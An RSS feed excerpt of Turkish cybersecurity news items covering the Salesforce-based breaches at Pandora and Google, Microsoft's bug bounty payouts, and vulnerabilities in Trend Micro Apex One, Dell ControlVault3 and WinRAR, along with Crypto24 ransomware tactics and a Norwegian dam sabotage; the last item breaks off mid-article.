<media:keywords>Pandora veri ihlalinde hangi müşteri bilgileri çalındı, Salesforce tabanlı saldırılar nasıl gerçekleştiriliyor, ShinyHunters grubu hangi tehditleri yöneltiyor, Salesforce şirketlere hangi güvenlik önerilerinde bulunuyor</media:keywords>
<content:encoded><![CDATA[<p>Dünya genelinde 2.700 mağazası ve 37 binden fazla çalışanı bulunan Danimarkalı mücevher devi <strong>Pandora</strong>, müşteri bilgilerinin çalındığı bir veri ihlalini doğruladı. Şirketin müşterilerine gönderdiği bilgilendirme mektubunda, “İletişim bilgileriniz, kullandığımız üçüncü taraf bir platform üzerinden yetkisiz kişilerce erişildi. Erişimi durdurduk ve güvenlik önlemlerimizi güçlendirdik” ifadelerine yer verildi.</p>
<p><em>Forbes</em>’un haberine göre, saldırıda yalnızca müşteri isimleri, doğum tarihleri ve e-posta adresleri ele geçirildi. Parolalar, kimlik bilgileri veya finansal verilerin etkilenmediği açıklandı. <em>BleepingComputer</em>, verilerin Pandora’nın <strong>Salesforce</strong> veritabanından çalındığını öğrendi.</p>
<p>En az Ocak 2025’ten beri devam eden saldırı dalgasında, tehdit aktörleri sosyal mühendislik ve kimlik avı yöntemleriyle çalışanların Salesforce giriş bilgilerini çalıyor veya kötü amaçlı OAuth uygulamalarına yetki verilmesini sağlıyor. Bu erişimle şirketlerin Salesforce veritabanları indirilip fidye talebiyle şantaj yapılıyor.</p>
<p><strong>ShinyHunters</strong> grubu, şirketleri özel olarak fidye talepleriyle tehdit ettiklerini ve ödeme yapılmaması halinde verilerin toplu satışını veya sızdırılmasını planladıklarını doğruladı. Grup, Snowflake veri hırsızlığı saldırılarında da benzer yöntemler kullanmıştı.</p>
<p><strong>Salesforce</strong> ise kendi platformunun saldırıya uğramadığını, olayların bilinen bir güvenlik açığından kaynaklanmadığını belirterek, tüm müşterilere çok faktörlü kimlik doğrulama (MFA) kullanmaları, en az ayrıcalık ilkesini uygulamaları ve bağlı uygulamaları dikkatle yönetmeleri yönünde uyarıda bulundu.</p>
<p>Benzer saldırılardan <strong>Adidas</strong>, <strong>Qantas</strong>, <strong>Allianz Life</strong> ve <strong>LVMH</strong> bünyesindeki <strong>Louis Vuitton</strong>, <strong>Dior</strong> ile <strong>Tiffany & Co.</strong> markalarının da etkilendiği biliniyor. Ancak, henüz kamuoyuna açıklanmayan başka şirketlerin de saldırıya uğradığı belirtiliyor.</p>
<p>Kaynak: <strong>CUMHA - CUMHUR HABER AJANSI</strong></p>]]> </content:encoded>
</item>

<item>
<title>Microsoft, son 12 ayda güvenlik araştırmacılarına rekor 17 milyon dolar ödedi</title>
<link>https://www.ajansexpres.com.tr/microsoft-son-12-ayda-guvenlik-arastirmacilarina-rekor-17-milyon-dolar-oededi</link>
<guid>https://www.ajansexpres.com.tr/microsoft-son-12-ayda-guvenlik-arastirmacilarina-rekor-17-milyon-dolar-oededi</guid>
<description><![CDATA[ Microsoft, Temmuz 2024 – Haziran 2025 döneminde 59 ülkeden 344 güvenlik araştırmacısına toplam 17 milyon dolar bug bounty ödemesi yaptı. En yüksek bireysel ödül 200 bin dolara ulaşırken, bildirilen 1.469 güvenlik açığı raporu 1.000’den fazla potansiyel riski ortadan kaldırdı. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cd916d9bc.webp" length="51760" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:28:49 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Microsoft bug bounty programı son 12 ayda hangi sonuçları elde etti, en yüksek ödül miktarı ne oldu, hangi ürünler program kapsamına alındı, 2025 Zero Day Quest yarışmasında ne kadar ödül verilecek</media:keywords>
<content:encoded><![CDATA[<p><strong>Microsoft</strong>, bug bounty programı kapsamında son 12 ayda rekor seviyede ödeme yaptığını açıkladı. Şirket, Temmuz 2024 ile Haziran 2025 arasında 59 ülkeden 344 güvenlik araştırmacısına toplam <strong>17 milyon dolar</strong> ödedi.</p>
<p>Araştırmacılar bu dönemde <strong>1.469</strong> geçerli güvenlik açığı raporu sundu. En yüksek ödül <strong>200 bin dolar</strong> olurken, raporlar Azure, Microsoft 365, Dynamics 365, Power Platform, Windows, Edge ve Xbox gibi ürünlerde 1.000’den fazla potansiyel güvenlik açığının giderilmesine katkı sağladı.</p>
<p>Microsoft, bağımsız araştırmacıların özellikle yapay zeka gibi hızla gelişen alanlarda yüksek etkili güvenlik açıklarını bulmasının, yeni tehditlerin önünde olunmasına yardımcı olduğunu belirtti. Şirket, <em>Koordine Edilmiş Güvenlik Açığı Bildirimi (Coordinated Vulnerability Disclosure)</em> sürecinin kullanıcı güvenini güçlendirdiğini vurguladı.</p>
<p>Bu yıl Microsoft, Copilot AI, Defender ürünleri ve çeşitli kimlik yönetim sistemlerini kapsayan bounty programlarını genişletti. Copilot programına geleneksel çevrimiçi hizmet açıkları eklendi, Dynamics 365 ve Power Platform’a yeni bir yapay zeka kategorisi dahil edildi. Windows programına ise uzaktan hizmet reddi (DoS) ve yerel sandbox kaçış senaryoları ödülleri eklendi.</p>
<p>Kimlik doğrulama programı artık daha fazla API ve alan adını kapsarken, Defender programı Microsoft Defender for Identity (MDI), Microsoft Defender for Office (MDO) ve Microsoft Defender for Cloud Applications (MDA) ürünlerini de içeriyor.</p>
<p>Şirket, son dönemde orta seviye Microsoft Copilot güvenlik açıkları için ödülleri artırdı, bazı .NET ve ASP.NET Core açıkları için 40 bin dolara kadar ödeme yapacağını açıkladı. Ayrıca Power Platform ve Dynamics 365 AI açıkları için ödüller yükseltildi.</p>
<p>Microsoft, bu hafta başında <strong>2025 Zero Day Quest</strong> yarışmasında toplam <strong>5 milyon dolara</strong> kadar ödül dağıtacağını da duyurdu. Şirket, etkinliği “tarihin en büyük hacking organizasyonu” olarak tanımlıyor.</p>
<p>Kaynak: <strong>CUMHA - CUMHUR HABER AJANSI</strong></p>]]> </content:encoded>
</item>

<item>
<title>Trend Micro, Apex One’da aktif olarak istismar edilen kritik güvenlik açığı için acil önlem çağrısı yaptı</title>
<link>https://www.ajansexpres.com.tr/trend-micro-apex-oneda-aktif-olarak-istismar-edilen-kritik-guvenlik-acigi-icin-acil-oenlem-cagrisi-yapti</link>
<guid>https://www.ajansexpres.com.tr/trend-micro-apex-oneda-aktif-olarak-istismar-edilen-kritik-guvenlik-acigi-icin-acil-oenlem-cagrisi-yapti</guid>
<description><![CDATA[ Trend Micro, Apex One Management Console’daki komut enjeksiyonu zafiyetinin (CVE-2025-54948 ve CVE-2025-54987) aktif saldırılarda kullanıldığını duyurdu. Henüz yama yayımlanmadı, ancak geçici koruma sağlayan bir araç kullanıma sunuldu. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cd8d7414e.webp" length="33958" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:28:45 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>CVE-2025-54948 ve CVE-2025-54987 güvenlik açıkları nasıl istismar ediliyor, Trend Micro hangi geçici çözümü sundu, yama ne zaman yayımlanacak, yönetim konsoluna erişim nasıl sınırlandırılmalı</media:keywords>
<content:encoded><![CDATA[<p><strong>Trend Micro</strong>, uç nokta güvenlik platformu <strong>Apex One</strong>’da tespit edilen ve aktif olarak istismar edilen kritik bir güvenlik açığı konusunda müşterilerini uyardı. <strong>CVE-2025-54948</strong> ve <strong>CVE-2025-54987</strong> olarak takip edilen zafiyet, <em>Apex One Management Console (on-premise)</em> bileşenindeki komut enjeksiyonu hatasından kaynaklanıyor.</p>
<p>Bu açık, kimlik doğrulaması gerekmeksizin saldırganların sistemde uzaktan rastgele kod çalıştırmasına imkân veriyor. Şirket, güvenlik yamasının henüz hazır olmadığını, ancak istismarı engellemek için kısa vadeli koruma sağlayan bir geçici önlem aracının yayımlandığını açıkladı.</p>
<p>Geçici çözüm, bilinen tüm istismar yöntemlerine karşı koruma sağlasa da, <em>Remote Install Agent</em> fonksiyonunu devre dışı bırakıyor. Bu nedenle yöneticiler, güvenlik yaması yayımlanana kadar uzak ajan kurulumlarını kullanamayacak.</p>
<p>Trend Micro, güvenlik güncellemesinin 2025 Ağustos ortasında yayımlanacağını ve bu yamayla birlikte devre dışı bırakılan işlevin geri geleceğini belirtti. Şirket, özellikle yönetim konsolunun IP adresini internete açık tutan kullanıcıların, erişimi kısıtlayacak önlemleri derhal uygulamasını tavsiye etti.</p>
<p><strong>Japonya Ulusal Bilgisayar Acil Müdahale Ekibi (JPCERT)</strong> de güvenlik açığı için uyarı yayımlayarak kullanıcıları en kısa sürede geçici mitigasyonları uygulamaya çağırdı.</p>
<p>Trend Micro geçmişte de Apex One’daki sıfırıncı gün açıklarını kapatmış, Eylül 2022’de <strong>CVE-2022-40139</strong> ve Eylül 2023’te <strong>CVE-2023-41179</strong> güvenlik açıklarını yamalamıştı. Şirket, bu ayın başında ise Apex Central ve Endpoint Encryption (TMEE) PolicyServer ürünlerindeki kritik yetki atlatma ve uzaktan kod çalıştırma açıklarını gidermişti.</p>
<p>Kaynak: <strong>CUMHA - CUMHUR HABER AJANSI</strong></p>]]> </content:encoded>
</item>

<item>
<title>WhatsApp, grup davetleri üzerinden yapılan dolandırıcılıklara karşı yeni güvenlik özelliğini devreye aldı</title>
<link>https://www.ajansexpres.com.tr/whatsapp-grup-davetleri-uzerinden-yapilan-dolandiriciliklara-karsi-yeni-guvenlik-oezelligini-devreye-aldi</link>
<guid>https://www.ajansexpres.com.tr/whatsapp-grup-davetleri-uzerinden-yapilan-dolandiriciliklara-karsi-yeni-guvenlik-oezelligini-devreye-aldi</guid>
<description><![CDATA[ WhatsApp, tanımadığınız kişiler tarafından grup sohbetlerine eklenmeniz durumunda “güvenlik özeti” kartı göstererek olası dolandırıcılık girişimlerini tespit etmenizi sağlayacak yeni bir özellik sundu. Şirket, yılın ilk yarısında 6,8 milyon dolandırıcı hesap kapattığını açıkladı. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cd89a2f9e.webp" length="32012" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:28:41 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>WhatsApp’ın güvenlik özeti özelliği nasıl çalışıyor, grup davetleri dolandırıcılıkta hangi yöntemlerle kullanılıyor, kapatılan 6, 8 milyon hesap hangi faaliyetlerle bağlantılı, dolandırıcılık merkezleri hangi taktikleri kullanıyor</media:keywords>
<content:encoded><![CDATA[<p><strong>WhatsApp</strong>, kullanıcılarını grup sohbetleri üzerinden hedef alan dolandırıcılık girişimlerine karşı yeni bir güvenlik özelliği duyurdu. Buna göre, kişi listenizde olmayan biri sizi bir gruba eklediğinde, ekrana bir “<em>güvenlik özeti</em>” (<em>safety overview</em>) kartı çıkacak.</p>
<p>Bu kart, grubun oluşturulma tarihi, üye sayısı, potansiyel dolandırıcılık uyarıları ve grup davetlerini nasıl kontrol edebileceğinize dair bilgiler içeriyor. Kullanıcılar, sohbeti hiç açmadan gruptan ayrılabilecek ya da bilgileri inceledikten sonra sohbete girerek bağlamı görebilecek. Bu süre zarfında grup bildirimleri sessize alınacak.</p>
<p>Uygulama ayrıca, kişi listenizde olmayan bir numaradan mesaj aldığınızda, gönderen hakkında ek bilgi vererek dikkatli olmanız konusunda uyarı yapacak. WhatsApp, “Bilinmeyen bir numaradan gelen, hızlı kazanç vaat eden veya olağandışı bir mesaj aldığınızda duraklayın, sorgulayın ve doğrulayın” tavsiyesinde bulundu.</p>
<p>Şirket, 2025’in ilk altı ayında kullanıcılarını hedef alan dolandırıcılık merkezleriyle bağlantılı 6,8 milyondan fazla hesabı devre dışı bıraktığını açıkladı. Yılın başında ise <strong>OpenAI</strong> ile iş birliği yaparak Kamboçya’da faaliyet gösteren bir dolandırıcılık merkezini kapattı. Bu merkez; kripto para yatırımı vaadi, sahte beğeni satışı ve kiralık scooter üzerinden yürütülen piramit şemaları gibi yöntemler kullanıyordu.</p>
<p>WhatsApp, Nisan ayında da özel sohbetlerde ve grup konuşmalarında paylaşılan hassas bilgileri korumak için <strong>Gelişmiş Sohbet Gizliliği</strong> (<em>Advanced Chat Privacy</em>) özelliğini devreye almıştı.</p>
<p>Kaynak: <strong>CUMHA - CUMHUR HABER AJANSI</strong></p>]]> </content:encoded>
</item>

<item>
<title>Dell’in ControlVault3 güvenlik açıkları, Windows oturum açma korumasını aşarak kalıcı zararlı yazılım yüklemeye izin veriyor</title>
<link>https://www.ajansexpres.com.tr/dellin-controlvault3-guvenlik-aciklari-windows-oturum-acma-korumasini-asarak-kalici-zararli-yazilim-yuklemeye-izin-veriyor</link>
<guid>https://www.ajansexpres.com.tr/dellin-controlvault3-guvenlik-aciklari-windows-oturum-acma-korumasini-asarak-kalici-zararli-yazilim-yuklemeye-izin-veriyor</guid>
<description><![CDATA[ Cisco Talos’un “ReVault” adını verdiği beş güvenlik açığı, 100’den fazla Dell Latitude ve Precision dizüstü modelini etkiliyor. Açıklar, fiziksel erişimi olan saldırganların Windows oturumunu atlatmasına, yönetici yetkileri kazanmasına ve sistem yeniden kurulumlarından sonra bile kalıcı olan zararlı yazılım yüklemesine olanak tanıyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cd85c1728.webp" length="38646" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:28:37 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>ReVault güvenlik açıkları Dell dizüstülerde hangi riskleri doğuruyor, fiziksel erişimle saldırı nasıl gerçekleştirilebiliyor, Dell bu açıklar için hangi güncellemeleri yayımladı, kullanıcılar hangi ek önlemleri almalı</media:keywords>
<content:encoded><![CDATA[<p><strong>Dell</strong>’in iş odaklı <strong>Latitude</strong> ve <strong>Precision</strong> serisi dizüstü bilgisayarlarında kullanılan <strong>ControlVault3</strong> donanım tabanlı güvenlik çözümünde beş kritik güvenlik açığı tespit edildi. <strong>Cisco Talos</strong> tarafından “<em>ReVault</em>” olarak adlandırılan açıklar, hem ControlVault3 bellenimini hem de Windows API bileşenlerini etkiliyor.</p>
<p>ControlVault, parolalar, biyometrik veriler ve güvenlik kodlarını anakart üzerindeki <strong>Unified Security Hub (USH)</strong> modülünde saklıyor. Ancak <strong>CVE-2025-24311</strong>, <strong>CVE-2025-25050</strong> (out-of-bounds), <strong>CVE-2025-25215</strong> (arbitrary free), <strong>CVE-2025-24922</strong> (stack overflow) ve <strong>CVE-2025-24919</strong> (güvensiz serileştirme) gibi açıklar zincirlenerek, saldırganların bellenimde keyfi kod çalıştırmasına imkân tanıyor.</p>
<p>Cisco Talos’a göre, fiziksel erişimi olan bir saldırgan cihazı açarak özel bir USB konnektörüyle USH modülüne doğrudan erişebilir. Bu yöntem, Windows oturum açma bilgisi veya tam disk şifreleme parolası olmadan açıkların istismar edilmesini mümkün kılıyor. Başarılı istismar, yönetici yetkisi kazanmayı, Windows oturumunu atlamayı ve parmak izi doğrulamasını manipüle ederek herhangi bir parmak izini kabul ettirmeyi sağlayabiliyor.</p>
<p><strong>Dell</strong>, Mart–Mayıs 2025 döneminde ControlVault3 sürücüsü ve bellenimi için güvenlik güncellemeleri yayımladı. Etkilenen modellerin tam listesi Dell’in güvenlik duyurusunda yer alıyor.</p>
<p>Cisco Talos, kullanıcıların sistemlerini Windows Update veya Dell’in resmi sitesinden güncel tutmalarını, kullanılmayan parmak izi okuyucu, akıllı kart okuyucu ve NFC gibi güvenlik donanımlarını devre dışı bırakmalarını öneriyor. Yüksek riskli ortamlarda parmak iziyle giriş özelliğinin kapatılması, BIOS üzerinden kasa açılma algılamanın (<em>chassis intrusion detection</em>) etkinleştirilmesi ve Windows’ta Gelişmiş Oturum Açma Güvenliği’nin (ESS) devreye alınması da tavsiye ediliyor.</p>
<p>Kaynak: <strong>CUMHA - CUMHUR HABER AJANSI</strong></p>]]> </content:encoded>
</item>

<item>
<title>Google, Salesforce tabanlı veri hırsızlığı saldırılarında müşteri bilgilerinin çalındığını doğruladı</title>
<link>https://www.ajansexpres.com.tr/google-salesforce-tabanli-veri-hirsizligi-saldirilarinda-musteri-bilgilerinin-calindigini-dogruladi</link>
<guid>https://www.ajansexpres.com.tr/google-salesforce-tabanli-veri-hirsizligi-saldirilarinda-musteri-bilgilerinin-calindigini-dogruladi</guid>
<description><![CDATA[ Google, Haziran ayında Salesforce CRM ortamlarından birinin ShinyHunters grubu tarafından ihlal edildiğini ve küçük-orta ölçekli işletmelere ait iletişim verilerinin ele geçirildiğini açıkladı. Şirket, saldırının sınırlı süreli erişimle gerçekleştiğini ve verilerin büyük ölçüde herkese açık iş bilgileri olduğunu belirtti. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cd81b69e6.webp" length="40900" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:28:33 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Google veri ihlalinde hangi bilgiler ele geçirildi, ShinyHunters grubu Salesforce saldırılarını nasıl gerçekleştiriyor, bu saldırı dalgasında hangi şirketler hedef alındı, fidye ödemeyen şirketler için nasıl bir tehdit söz konusu</media:keywords>
<content:encoded><![CDATA[<p><strong>Google</strong>, <strong>ShinyHunters</strong> adlı fidye ve veri hırsızlığı grubunun yürüttüğü Salesforce tabanlı saldırıların son kurbanı oldu. Haziran 2025’te yaşanan olayda, şirketin kurumsal Salesforce CRM ortamlarından biri ihlal edildi ve küçük-orta ölçekli işletmelere ait müşteri verileri çalındı.</p>
<p>Google’ın açıklamasına göre, ihlal edilen sistemde işletme adları, iletişim bilgileri ve ilgili notlar bulunuyordu. Erişim, sınırlı bir zaman diliminde sağlandıktan sonra engellendi. Şirket, verilerin çoğunun zaten kamuya açık olabilecek temel iş bilgileri olduğunu vurguladı.</p>
<p><strong>ShinyHunters</strong> grubu, saldırılarda çalışanları hedef alan sesli kimlik avı (<em>vishing</em>) ve sosyal mühendislik yöntemleriyle Salesforce hesaplarına erişim sağlıyor. Bu yöntemle müşteri veritabanlarını indirip şirketlerden fidye talep ediyor. Grup, fidye ödemeyen şirketlerin verilerini sızdırma veya satma tehdidinde bulunuyor.</p>
<p><em>BleepingComputer</em>’a konuşan ShinyHunters, birçok Salesforce ortamını ihlal ettiklerini ve saldırıların hâlen devam ettiğini doğruladı. Grup, bazı şirketleri e-posta yoluyla şantaj yaparken, bir şirketin verilerini sızdırmamak için 4 Bitcoin (yaklaşık 400 bin dolar) ödediği öğrenildi.</p>
<p>ShinyHunters, geçmişte <strong>PowerSchool</strong>, <strong>Oracle Cloud</strong>, <strong>Snowflake</strong>, <strong>AT&T</strong>, <strong>NitroPDF</strong>, <strong>Wattpad</strong> ve <strong>MathWay</strong> gibi birçok kurumun veri ihlallerinden sorumlu tutulmuştu.</p>
<p>Bu saldırılardan etkilenen diğer şirketler arasında <strong>Adidas</strong>, <strong>Qantas</strong>, <strong>Allianz Life</strong>, <strong>Cisco</strong> ve <strong>LVMH</strong> bünyesindeki <strong>Louis Vuitton</strong>, <strong>Dior</strong> ile <strong>Tiffany & Co.</strong> da yer alıyor.</p>
<p>Kaynak: <strong>CUMHA - CUMHUR HABER AJANSI</strong></p>]]> </content:encoded>
</item>

<item>
<title>WinRAR’daki sıfırıncı gün açığı, RomCom zararlı yazılımını yüklemek için hedefli saldırılarda kullanıldı</title>
<link>https://www.ajansexpres.com.tr/winrardaki-sifirinci-gun-acigi-romcom-zararli-yazilimini-yuklemek-icin-hedefli-saldirilarda-kullanildi</link>
<guid>https://www.ajansexpres.com.tr/winrardaki-sifirinci-gun-acigi-romcom-zararli-yazilimini-yuklemek-icin-hedefli-saldirilarda-kullanildi</guid>
<description><![CDATA[ CVE-2025-8088 olarak izlenen ve WinRAR 7.13 sürümüyle giderilen dizin geçişi açığı, oltalama e-postalarıyla dağıtılan özel hazırlanmış RAR arşivleri üzerinden istismar edildi. Açık, saldırganların dosyaları Windows başlangıç klasörüne yerleştirerek uzaktan kod çalıştırmasına imkân tanıyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cd7db3715.webp" length="34030" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:28:29 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>CVE-2025-8088 açığı nasıl çalışıyor, RomCom grubu bu açığı hangi yöntemle istismar etti, açık hangi WinRAR sürümüyle kapatıldı, kullanıcılar korunmak için ne yapmalı</media:keywords>
<content:encoded><![CDATA[<p><strong>WinRAR</strong>’ın Windows sürümlerinde tespit edilen <strong>CVE-2025-8088</strong> güvenlik açığının, yamalanmadan önce hedefli oltalama saldırılarında aktif olarak kullanıldığı ortaya çıktı. <strong>ESET</strong> araştırmacıları <strong>Anton Cherepanov</strong>, <strong>Peter Košinár</strong> ve <strong>Peter Strýček</strong> tarafından keşfedilen açık, WinRAR 7.13 sürümünde kapatıldı.</p>
<p>Dizin geçişi (<em>directory traversal</em>) hatasından kaynaklanan bu açık, özel hazırlanmış RAR arşivlerinin, kullanıcı tarafından belirtilen dizin yerine saldırganın tanımladığı bir konuma dosya çıkartmasına izin veriyor. Bu yöntemle, zararlı çalıştırılabilir dosyalar Windows’un başlangıç klasörlerine (<code>%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup</code> veya <code>%ProgramData%\Microsoft\Windows\Start Menu\Programs\StartUp</code>) yerleştirilebiliyor. Kullanıcı bir sonraki oturum açtığında, bu dosyalar otomatik olarak çalışarak saldırgana sistem üzerinde uzaktan kod çalıştırma imkânı sağlıyor.</p>
<p>ESET, saldırılarda hedefli oltalama e-postalarıyla gönderilen RAR dosyalarının bu açığı kullanarak <strong>RomCom</strong> arka kapı zararlı yazılımını yüklediğini belirledi. RomCom (<em>Storm-0978</em>, <em>Tropical Scorpius</em> veya <em>UNC2596</em> olarak da bilinir) Rusya bağlantılı bir tehdit grubu olup fidye yazılımı, veri hırsızlığı ve kimlik bilgisi toplama kampanyalarıyla tanınıyor. Grup daha önce Cuba ve Industrial Spy fidye yazılım operasyonlarıyla ilişkilendirilmişti.</p>
<p>WinRAR otomatik güncelleme özelliği sunmadığından, tüm kullanıcıların <a href=" adresinden en son sürümü manuel olarak indirmesi öneriliyor. ESET, açığın istismarına dair detaylı bir raporu daha sonra yayımlayacağını açıkladı.</p>
<p>Kaynak: <strong>CUMHA - CUMHUR HABER AJANSI</strong></p>]]> </content:encoded>
</item>

<item>
<title>Crypto24 fidye yazılımı büyük şirketlere saldırdı, EDR devre dışı bırakma aracıyla güvenlik sistemlerini aşmayı başardı</title>
<link>https://www.ajansexpres.com.tr/crypto24-fidye-yazilimi-buyuk-sirketlere-saldirdi-edr-devre-disi-birakma-araciyla-guvenlik-sistemlerini-asmayi-basardi</link>
<guid>https://www.ajansexpres.com.tr/crypto24-fidye-yazilimi-buyuk-sirketlere-saldirdi-edr-devre-disi-birakma-araciyla-guvenlik-sistemlerini-asmayi-basardi</guid>
<description><![CDATA[ ABD, Avrupa ve Asya’da büyük kuruluşları hedef alan Crypto24 fidye yazılım grubu, özel geliştirilmiş bir araçla güvenlik yazılımlarını etkisiz hale getirerek veri hırsızlığı ve dosya şifreleme saldırıları gerçekleştiriyor. Trend Micro araştırmacılarına göre saldırganlar eski fidye yazılım gruplarının üyelerinden oluşuyor olabilir. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cd795ba71.webp" length="64714" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:28:25 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Crypto24 fidye yazılım grubu hangi sektörleri hedef alıyor, saldırılarda hangi güvenlik yazılımları devre dışı bırakılıyor, veri hırsızlığı nasıl gerçekleştiriliyor, Trend Micro araştırmacıları hangi bulguları paylaştı</media:keywords>
<content:encoded><![CDATA[<p><br data-start="508" data-end="511">Crypto24 adıyla bilinen fidye yazılım grubu, son aylarda büyük ölçekli şirketlere yönelik saldırılar düzenleyerek dikkat çekmeye başladı. Trend Micro araştırmacılarının yayımladığı rapora göre saldırılar ABD, Avrupa ve Asya’da finans, üretim, teknoloji ve eğlence sektörlerinde faaliyet gösteren yüksek değerli hedeflere yönelik olarak gerçekleştirildi.</p>
<p></p>
<p data-start="868" data-end="1161">Grubun en erken faaliyetleri 2024 yılının Eylül ayında rapor edilmiş olsa da, saldırılar son dönemde daha gelişmiş yöntemlerle yürütülmeye başlandı. Araştırmacılar, kullanılan teknikler ve araçlar nedeniyle grubun eski fidye yazılım oluşumlarının üyelerinden oluşabileceğini değerlendiriyor.</p>
<p data-start="1163" data-end="1497"><strong data-start="1163" data-end="1185">Saldırı Yöntemleri</strong><br data-start="1185" data-end="1188">Saldırılar, Windows sistemlerinde yönetici hesaplarının etkinleştirilmesi veya yeni yerel hesapların oluşturulmasıyla başlıyor. Daha sonra saldırganlar, sistemde keşif faaliyetleri gerçekleştirerek donanım bilgilerini ve kullanıcı hesaplarını topluyor. Bu süreçte zararlı hizmetler ve görevler tanımlanıyor.</p>
<p data-start="1499" data-end="1655">Trend Micro’nun raporuna göre, kullanılan yöntemlerden biri WinMainSvc adlı keylogger hizmeti, diğeri ise MSRuntime adı verilen fidye yazılım yükleyicisi.</p>
<p data-start="1657" data-end="2028"><strong data-start="1657" data-end="1701">EDR Sistemlerini Devre Dışı Bırakan Araç</strong><br data-start="1701" data-end="1704">Crypto24’ün dikkat çeken yöntemlerinden biri, RealBlindingEDR adlı açık kaynak kodlu aracın özelleştirilmiş bir versiyonunun kullanılması. Bu araç, Trend Micro, Kaspersky, Sophos, SentinelOne, Malwarebytes, McAfee, Cisco ve Fortinet gibi birçok güvenlik yazılımını hedef alarak çekirdek düzeyinde devre dışı bırakabiliyor.</p>
<p data-start="2030" data-end="2286">Trend Micro ürünlerine yönelik olarak ise saldırganların XBCUninstaller.exe aracını kötüye kullandığı belirtildi. Normal şartlarda sistem sorunlarını gidermek için kullanılan bu araç, saldırı sırasında güvenlik ajanlarını kaldırmak amacıyla çalıştırıldı.</p>
<p data-start="2288" data-end="2592"><strong data-start="2288" data-end="2327">Veri Hırsızlığı ve Şifreleme Süreci</strong><br data-start="2327" data-end="2330">Saldırılar sırasında “Microsoft Help Manager” adıyla gizlenen keylogger aktif pencere başlıklarını ve tuş vuruşlarını kaydediyor. Ayrıca saldırganlar SMB paylaşımları üzerinden ağda yayılım sağlıyor ve çalınan verileri özel bir araçla Google Drive’a aktarıyor.</p>
<p data-start="2594" data-end="2834">Son aşamada ise sistemlerdeki gölge kopyalar silinerek fidye yazılımı devreye sokuluyor. Trend Micro, şifreleme yöntemleri veya fidye notları hakkında ayrıntılı bilgi paylaşmazken, savunma ekiplerine yönelik göstergeler listesi yayımladı.</p>
<p data-start="2836" data-end="3073"><strong data-start="2836" data-end="2848"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]> </content:encoded>
</item>

<item>
<title>Norveç’te baraj saldırısı: Pro&#45;Rus hackerlar su tahliye vanalarını açarak 7,2 milyon litre suyun akmasına yol açtı</title>
<link>https://www.ajansexpres.com.tr/norvecte-baraj-saldirisi-pro-rus-hackerlar-su-tahliye-vanalarini-acarak-72-milyon-litre-suyun-akmasina-yol-acti</link>
<guid>https://www.ajansexpres.com.tr/norvecte-baraj-saldirisi-pro-rus-hackerlar-su-tahliye-vanalarini-acarak-72-milyon-litre-suyun-akmasina-yol-acti</guid>
<description><![CDATA[ Norveç güvenlik birimleri, Nisan ayında gerçekleşen baraj sabotajının arkasında pro-Rus hackerların olduğunu açıkladı. Hackerların Bremanger barajının dijital kontrol sistemini ele geçirerek tahliye vanalarını açtığı, olayın Norveç’in kritik altyapısına yönelik bir gövde gösterisi olduğu değerlendiriliyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202508/image_870x580_68a5cd7542d81.webp" length="34176" type="image/jpeg"/>
<pubDate>Wed, 20 Aug 2025 16:28:21 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Norveç’te baraj sabotajı nasıl gerçekleşti, saldırıda ne kadar su tahliye edildi, hackerların amacı neydi, Norveçli yetkililer Rusya’yı nasıl değerlendiriyor</media:keywords>
<content:encoded><![CDATA[<p><br data-start="478" data-end="481">Norveç Polisi Güvenlik Servisi (PST), Nisan ayında yaşanan baraj saldırısının pro-Rus hackerlar tarafından gerçekleştirildiğini duyurdu. Açıklamaya göre saldırganlar, Bremanger barajındaki su akışını kontrol eden dijital sisteme sızarak tahliye vanalarını açtı.</p>
<p></p>
<p data-start="746" data-end="1142">PST Başkanı Beate Gangås, Arendal kentinde düzenlenen Arendalsuka ulusal forumunda yaptığı açıklamada olayın doğrudan zarar vermekten çok, Rusya’nın siber yeteneklerini sergilemeye yönelik olduğunu belirtti. Gangås, “Amaçları yıkım yaratmak değil, neler yapabileceklerini göstermek” ifadelerini kullandı. Ayrıca bu tür eylemlerin toplumda korku ve huzursuzluk yaratmayı hedeflediğini vurguladı.</p>
<p data-start="1144" data-end="1344"><strong data-start="1144" data-end="1169">Dört Saatlik Müdahale</strong><br data-start="1169" data-end="1172">Yerel basına göre baraj operatörleri yaklaşık dört saat içinde saldırıyı fark ederek vanaları yeniden kapattı. Bu süre zarfında 7,2 milyon litreden fazla su tahliye oldu.</p>
